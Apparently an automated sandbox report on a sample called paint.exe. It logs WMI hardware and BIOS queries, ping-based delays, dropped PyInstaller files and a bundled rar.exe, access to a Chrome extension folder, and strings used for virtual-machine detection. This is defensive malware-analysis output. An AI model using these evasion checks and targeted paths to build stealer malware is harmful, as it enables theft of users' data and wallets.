Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 3

Source: C:\Users\user\Desktop\paint.exe

Code function: 1_2_00007FFDFB0D632A str word ptr [rax+63h]

1_2_00007FFDFB0D632A

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2662	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2313
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2524
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 518
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3425
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 528
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4033
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2023
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4259
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 415
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2911
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1127
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2738
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1758

Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\python312.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file

Source: C:\Users\user\Desktop\paint.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-17459

Source: C:\Users\user\Desktop\paint.exe

API coverage: 5.6 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7360	Thread sleep count: 2662 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep count: 2313 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7356	Thread sleep count: 2524 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7536	Thread sleep count: 518 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8356	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8308	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8416	Thread sleep count: 3425 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8448	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8420	Thread sleep count: 528 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8436	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8108	Thread sleep count: 4033 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8108	Thread sleep count: 2023 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4916	Thread sleep count: 4259 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7080	Thread sleep count: 415 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5324	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1060	Thread sleep count: 2911 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8912	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1060	Thread sleep count: 1127 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8824	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8484	Thread sleep count: 2738 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8480	Thread sleep count: 1758 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9072	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BD92F0 FindFirstFileExW,FindClose,	0_2_00007FF6F0BD92F0
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BD83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF6F0BD83B0
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BF18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF6F0BF18E4
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BD92F0 FindFirstFileExW,FindClose,	1_2_00007FF6F0BD92F0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BD83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	1_2_00007FF6F0BD83B0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BF18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00007FF6F0BF18E4
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DF46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	88_2_00007FF623DF46EC
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DEE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	88_2_00007FF623DEE21C
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E388E0 FindFirstFileExA,	88_2_00007FF623E388E0

Source: C:\Users\user\Desktop\paint.exe

Code function: 1_2_00007FFDFB071240 GetSystemInfo,

1_2_00007FFDFB071240

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: getmac.exe, 0000003A.00000003.1802790638.00000233D78E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000003.1802790638.00000233D78CB000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000002.1805502714.00000233D78E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: getmac.exe, 0000003A.00000003.1802790638.00000233D78E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000002.1805502714.00000233D78E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWt
Source: getmac.exe, 0000003A.00000003.1802790638.00000233D78E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000003.1803090796.00000233D78F9000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000002.1805502714.00000233D78FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport:
Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: d01qemu-ga
Source: getmac.exe, 0000003A.00000003.1802790638.00000233D78CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"TEMR
Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareuser
Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: getmac.exe, 0000003A.00000003.1802790638.00000233D78E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000003.1803090796.00000233D78F9000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000002.1805502714.00000233D78FB000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000003.1802790638.00000233D78CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: rar.exe, 00000058.00000003.1934045500.0000028E54D78000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -9a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#3f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: paint.exe, 00000001.00000002.2008200069.0000020771094000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000003.1802790638.00000233D78E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000002.1805502714.00000233D78E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: pf_importvmware
Source: getmac.exe, 0000003A.00000003.1802790638.00000233D78E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000003.1803090796.00000233D78F9000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000002.1805502714.00000233D78FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: f8vmsrvc
Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmtoolsd
Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwaretray
